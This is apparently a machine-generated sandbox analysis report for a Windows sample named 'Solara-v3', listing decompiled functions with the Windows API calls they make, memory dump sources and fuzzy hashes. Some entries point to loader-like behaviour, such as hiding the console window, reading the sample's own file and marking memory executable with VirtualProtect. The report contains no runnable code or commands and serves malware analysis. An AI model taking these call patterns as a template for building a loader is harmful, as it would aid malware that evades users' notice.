• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2911764282-0
                                                                                                                                                                                                                                              • Opcode ID: 15cf3c8d83c8c39a360d0292e7e00b11535b4b82b9b8ad1bbe65d2e346971d45
                                                                                                                                                                                                                                              • Instruction ID: 9ca4b8d43c567d61fb7b0063a99f1d38f30d60443d61300d43a8c35dc18fe07c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15cf3c8d83c8c39a360d0292e7e00b11535b4b82b9b8ad1bbe65d2e346971d45
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E971D3B2C002199BCF10DFA4DC49BAEBBB5FF48324F140629E854B7391E7319A55DBA1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 75a05097f707e5fe1a29ae825962998c4151c759332a6706fb0744709a00d183
                                                                                                                                                                                                                                              • Instruction ID: d7ea9445a130c15bcdc44eb79e625b9dc650a26df34266af1a6dddbac7d57c16
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75a05097f707e5fe1a29ae825962998c4151c759332a6706fb0744709a00d183
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6213C336141660B8F5C9F386D67037FB4ADB875A0749673ADD239F2D1E521DE1082E4

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleWindow.KERNELBASE ref: 00C924DD
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00C924E6
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C92524
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00C9253A,?,?,00000000), ref: 00C9F129
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00C9253A,?,?,00000000), ref: 00C9F142
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: CloseHandle.KERNEL32(?,?,?,00C9253A,?,?,00000000), ref: 00C9F154
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92567
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92578
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92589
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C9259A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3956949563-0
                                                                                                                                                                                                                                              • Opcode ID: f0dab722603f7f490684830244e17ffe6a5ca9464f16dd55408b1a6e103aa45d
                                                                                                                                                                                                                                              • Instruction ID: b14a5c59f468ddd3f19eddd5ecbd37838070bdc5bb7a8d7dcf1ea6b8bbe56192
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0dab722603f7f490684830244e17ffe6a5ca9464f16dd55408b1a6e103aa45d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 862176F2D40215ABDF10EFD49D0AB9EBAB4BF04710F080169F51876291E7B59A14CBE6

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,3F29B6ED,?,00CAD01A,?,?,00000000), ref: 00CACFCC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                              • Opcode ID: 2790d3a78368be15c2a3f4c40c4ef0f4a43a5e4e57c4a5dcf967c2165d1e5c8c
                                                                                                                                                                                                                                              • Instruction ID: 53d84e4c08df3216ab2efc087667f7002da748d55771617ac851ba7751b2f167
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2790d3a78368be15c2a3f4c40c4ef0f4a43a5e4e57c4a5dcf967c2165d1e5c8c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F21E731A01312EFC7319BE5DC81F6E7769DB56768F250161F926A7290DB30EE00C6D0

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                              • Opcode ID: 31a00ee20472258e0df625af196fa4db0c50ac47032582080b79378e248add9c
                                                                                                                                                                                                                                              • Instruction ID: b9fe75b6089a17dd818b41f35d376e6c35765f103bea6b1e03f2d08101904e2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31a00ee20472258e0df625af196fa4db0c50ac47032582080b79378e248add9c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF14D75A006158FCF14CF69C498BADBBF2FF88324F1942A9E815AB391D734AD45CB90

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00CA5392
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00C92513,00000000,00000000), ref: 00CA539E
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CA53A5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744730728-0
                                                                                                                                                                                                                                              • Opcode ID: 34e2bf8d0948406a932e39ecd9f369064cc785e8f79b607908884773f7800355
                                                                                                                                                                                                                                              • Instruction ID: 4df5a496fbfe7e5516c98968a123f41d1137c0c0a4bdc3289e32b2075eaae4c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34e2bf8d0948406a932e39ecd9f369064cc785e8f79b607908884773f7800355
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6019E7250261AEFCF159FA0DC06AAE3B64FF423A8F008158F801921A0EBB1DA40EB50

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC2BB: GetLastError.KERNEL32(00000000,?,00CA76E9,00CAD306,?,?,00CAC1B7,00000001,00000364,?,00000005,000000FF,?,00CA5495,00CC8E38,0000000C), ref: 00CAC2BF
                                                                                                                                                                                                                                                • Part of subcall function 00CAC2BB: SetLastError.KERNEL32(00000000), ref: 00CAC361
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00CA53D9,?,?,00CA54CE,00000000), ref: 00CA551F
                                                                                                                                                                                                                                              • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00CA53D9,?,?,00CA54CE,00000000), ref: 00CA5535
                                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00CA553E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1991824761-0
                                                                                                                                                                                                                                              • Opcode ID: 0671adb0ac7cebc6cf330b6a985761c910e2e18bcb8192f60b8ceb25799caf24
                                                                                                                                                                                                                                              • Instruction ID: 30ef9ed2899e34bfe480b20c9c58d6ee2eca7acddb99edbf40346aaa330cb5af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0671adb0ac7cebc6cf330b6a985761c910e2e18bcb8192f60b8ceb25799caf24
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78F01271900E076BCB355B75D958B5E7B9AAF02378B18C614F879C71E0DB30DE528750

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000002,?,00CA5721,00CA8396,00CA8396,?,00000002,3F29B6ED,00CA8396,00000002), ref: 00CA5670
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00CA5721,00CA8396,00CA8396,?,00000002,3F29B6ED,00CA8396,00000002), ref: 00CA5677
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00CA5689
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              • Opcode ID: 3a8806e96c74a83d16ed45a578eab1a809c2b2774bdfce2849d1517d66aff311
                                                                                                                                                                                                                                              • Instruction ID: ed9a76530854d274a3ef001bb797dda2ccb56156b44a0b4d0fdda200de2a8e1f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a8806e96c74a83d16ed45a578eab1a809c2b2774bdfce2849d1517d66aff311
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22D09231100609BFCF012F61DE0DE9D3F2AEF45386B448010F9594A272DF32DA52EA84

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CB3F9E: GetConsoleOutputCP.KERNEL32(3F29B6ED,00000000,00000000,?), ref: 00CB4001
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00CA8584,?), ref: 00CB3D79
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CA8584,?,00CA87C8,00000000,?,00000000,00CA87C8,?,?,?,00CC8FE8,0000002C,00CA86B4,?), ref: 00CB3D83
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2915228174-0

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00CB3D5F,00000000,00CA87C8,?,00000000,?,00000000), ref: 00CB4469
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CB3D5F,00000000,00CA87C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00CA8584), ref: 00CB448F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 442123175-0

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C991C9
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C991D7
                                                                                                                                                                                                                                                • Part of subcall function 00C9EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00C98E4A,00C9A2F0), ref: 00C9EFE7
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3666349979-0

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00CAD941,00CC9330,0000000C), ref: 00CADA9E
                                                                                                                                                                                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00CAD941,00CC9330,0000000C), ref: 00CADAB0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3000768030-0

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C91240: _strlen.LIBCMT ref: 00C912BA
                                                                                                                                                                                                                                              • FreeConsole.KERNELBASE(?,?,?,?,?,00C9173F,?,?,?,00000000,?), ref: 00C91F21
                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00CCA011,00000549,00000040,?), ref: 00C91F78
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1248733679-0
                                                                                                                                                                                                                                              • Opcode ID: e5e9f9f41778950941fc4d8b29e1b4b9bf478507d0b6e3e79da8199b99bdfb7b
                                                                                                                                                                                                                                              • Instruction ID: 31da70a1cf8ca41b7c7a95351f74447f3ad80a833c5005f248e6ff6a7c0e8359
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5e9f9f41778950941fc4d8b29e1b4b9bf478507d0b6e3e79da8199b99bdfb7b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D11A071E402096BDF04BBA5EC0BFBE77B4EB44705F044439FA09A72C2EA759A5097D1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00CC8E38,0000000C), ref: 00CA5483
                                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00CA548A
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1611280651-0
                                                                                                                                                                                                                                              • Opcode ID: f560b58f38598b270b5109fa4d7dc9cbc3941f9625fa984a7aeedbe92ae23014
                                                                                                                                                                                                                                              • Instruction ID: 7536780d9785174cf53649e910bf05aaa0825c4df70025e1104db4f300125304
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f560b58f38598b270b5109fa4d7dc9cbc3941f9625fa984a7aeedbe92ae23014
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57F0C271A006169FDB00AFB0C94AF6E7B70FF46745F108059F00197292DF745942EB50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00C92288
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C9229C
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: CreateFileA.KERNELBASE ref: 00C92036
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00C92046
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00C9206B
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: CloseHandle.KERNELBASE(00000000), ref: 00C9207A
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: _strlen.LIBCMT ref: 00C920CD
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3505371420-0
                                                                                                                                                                                                                                              • Opcode ID: e03483bf023f375673a1a19e6581df13b462dd03d25923a928c260afab89272c
                                                                                                                                                                                                                                              • Instruction ID: a09c0848c368516c654e7385fedfc8024c61c1f1f2ee75aa430edac2d33e8105
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e03483bf023f375673a1a19e6581df13b462dd03d25923a928c260afab89272c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF0EDB2A002202BD6216764EC4FFAF7BACDF89710F000918F5894B281EA74165597D3
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00CB02B4,?,00000000,?,?,00CAFF54,?,00000007,?,?,00CB089A,?,?), ref: 00CABEED
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CB02B4,?,00000000,?,?,00CAFF54,?,00000007,?,?,00CB089A,?,?), ref: 00CABEF8
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                              • Opcode ID: 08fb8dac41f78276addc26dd3dd7723b045eaf5f5f50bb0a68b9d7b621aa5dd7
                                                                                                                                                                                                                                              • Instruction ID: 22adae0cfd9f3addca4d4dfd287556a900dda455215ed25c4b156492f739c9c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08fb8dac41f78276addc26dd3dd7723b045eaf5f5f50bb0a68b9d7b621aa5dd7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3E08C32204215ABCB116FA4EC08F993B68FB01399F144061F618D6171DB308D40CB94
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                              • Opcode ID: 3f0a7cf1c5f5bcdbfb0855150e8a9ae46783aa7eaecce4d991074e5f0f54fed5
                                                                                                                                                                                                                                              • Instruction ID: d788fe3be2e5d6fcdc2c83e7ef3c8eaf3067293c0c8d832cae2a1d97e447b40f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0a7cf1c5f5bcdbfb0855150e8a9ae46783aa7eaecce4d991074e5f0f54fed5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D711A0313856176BE7112BF5ECC7F2F266CAB0376CF140224F721910E3DB628D04A160
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f88b6a9300c4cfc85ba61112d504b2f106fa843cfacf50f15a9c6452a92d71d7
                                                                                                                                                                                                                                              • Instruction ID: 5eb2c89efff8d4ba01439eaa0cc2b2b0534ab2098785aa4a3e51166637afacb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f88b6a9300c4cfc85ba61112d504b2f106fa843cfacf50f15a9c6452a92d71d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2417132A0011AEFCF14DFA9C4989EDB7B9FF18314B544069E446E7640E731EA55EB90
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 755ff8568436966a505a08657b446bd87c27ae2402f519f4b94fae0b8bf4cde9
                                                                                                                                                                                                                                              • Instruction ID: ae6fb3ac60c233e1560502f3534165a8e3eb905d6f12d69cdef43be5655260df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 755ff8568436966a505a08657b446bd87c27ae2402f519f4b94fae0b8bf4cde9
